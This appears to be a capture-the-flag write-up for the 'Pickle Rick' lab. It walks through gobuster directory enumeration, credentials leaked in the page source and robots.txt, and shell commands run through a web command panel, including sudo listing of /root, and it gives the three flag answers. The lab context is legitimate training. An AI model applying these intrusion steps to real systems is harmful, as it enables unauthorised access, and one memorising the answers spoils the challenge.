PICKLE RICH 

********************************************************************************************************************************************************

Task 1: Pickle Rick

[*] Deploy the VM 

[*] Target: 10.10.158.98

[*] This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

[Question 1]: What is the first ingredient that Rick needs?

[*] Access http://10.10.158.98 

    [+] Check source

    [+] We can see that in source:

    <--
        Note to self, remember username!

        Username: R1ckRul3s
    -->

    [+] Okay, we have username.

[*] Now, we can't see anything else in this source code and thinking about way. Something can scan this website. 

    [+] We use gobuster for scan this website and see this

        # gobuster dir -u http://10.10.158.98/ -w /usr/share/wordlists/rockyou.txt -t 20 -x php,txt,html
        ===============================================================
        Gobuster v3.0.1
        by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
        ===============================================================
        [+] Url:            http://10.10.158.98/
        [+] Threads:        20
        [+] Wordlist:       /usr/share/wordlists/rockyou.txt
        [+] Status codes:   200,204,301,302,307,401,403
        [+] User Agent:     gobuster/3.0.1
        [+] Extensions:     php,txt,html
        [+] Timeout:        10s
        ===============================================================
        2023/07/27 17:31:38 Starting gobuster
        ===============================================================
        [ERROR] 2023/07/27 17:31:42 [!] parse http://10.10.158.98/!@#$%^: invalid URL escape "%^"
        /login.php (Status: 200)
        /robots.txt (Status: 200)

    [+] Try to access /robots.txt 

    [+] We can see that: Wubbalubbadubdub. Maybe here is password for username.

    [+] With /robots.txt, we have /login.php. We have username and something like password, we will go to /login.php and try that.

    [+] Okay, that correct and we can log in to this website. However, we can't see anything in this. Click everywhere and steel see the denied.php.

    [+] See the command submit, try submit anything that.

[*] I submit "ls" command and see some txt,html,php file.

    [+] Sup3rS3cretPickl3Ingred.txt
        assets
        clue.txt
        denied.php
        index.html
        login.php
        portal.php
        robots.txt

    [+] Try "cat" command and fail, we use "less" replace.

    [+] Done, "less Sup3rS3cretPickl3Ingred.txt"

    mr. meeseek hair 

    [!] Answer: mr. meeseek hair

[Question 2]: What is the second ingredient in Rick’s potion?

[*] I cat the clue.txt and see this: Look around the file system for the other ingredient.

    [+] In this command submit button, we will submit this command 

        [->] ls -la /home/rick 

        [-] total 12
            drwxrwxrwx 2 root root 4096 Feb 10  2019 .
            drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
            -rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

        [-] Cat the second ingredient file and complete question 2

    [!] Answer: 1 jerry tear

[Question 3]: What is the last and final ingredient?

[*] Okay, keep walking around, I think we can find the 3rd ingredient.

    [+] I try submit this command: "sudo ls -la /root"

    total 28
    drwx------  4 root root 4096 Feb 10  2019 .
    drwxr-xr-x 23 root root 4096 Jul 27 16:18 ..
    -rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
    -rw-r--r--  1 root root  148 Aug 17  2015 .profile
    drwx------  2 root root 4096 Feb 10  2019 .ssh
    -rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
    drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

    [+] Sweet, we can see the 3rd.txt. Now we're reading this file and complete this room. 

    [!] Answer: fleeb juice
    
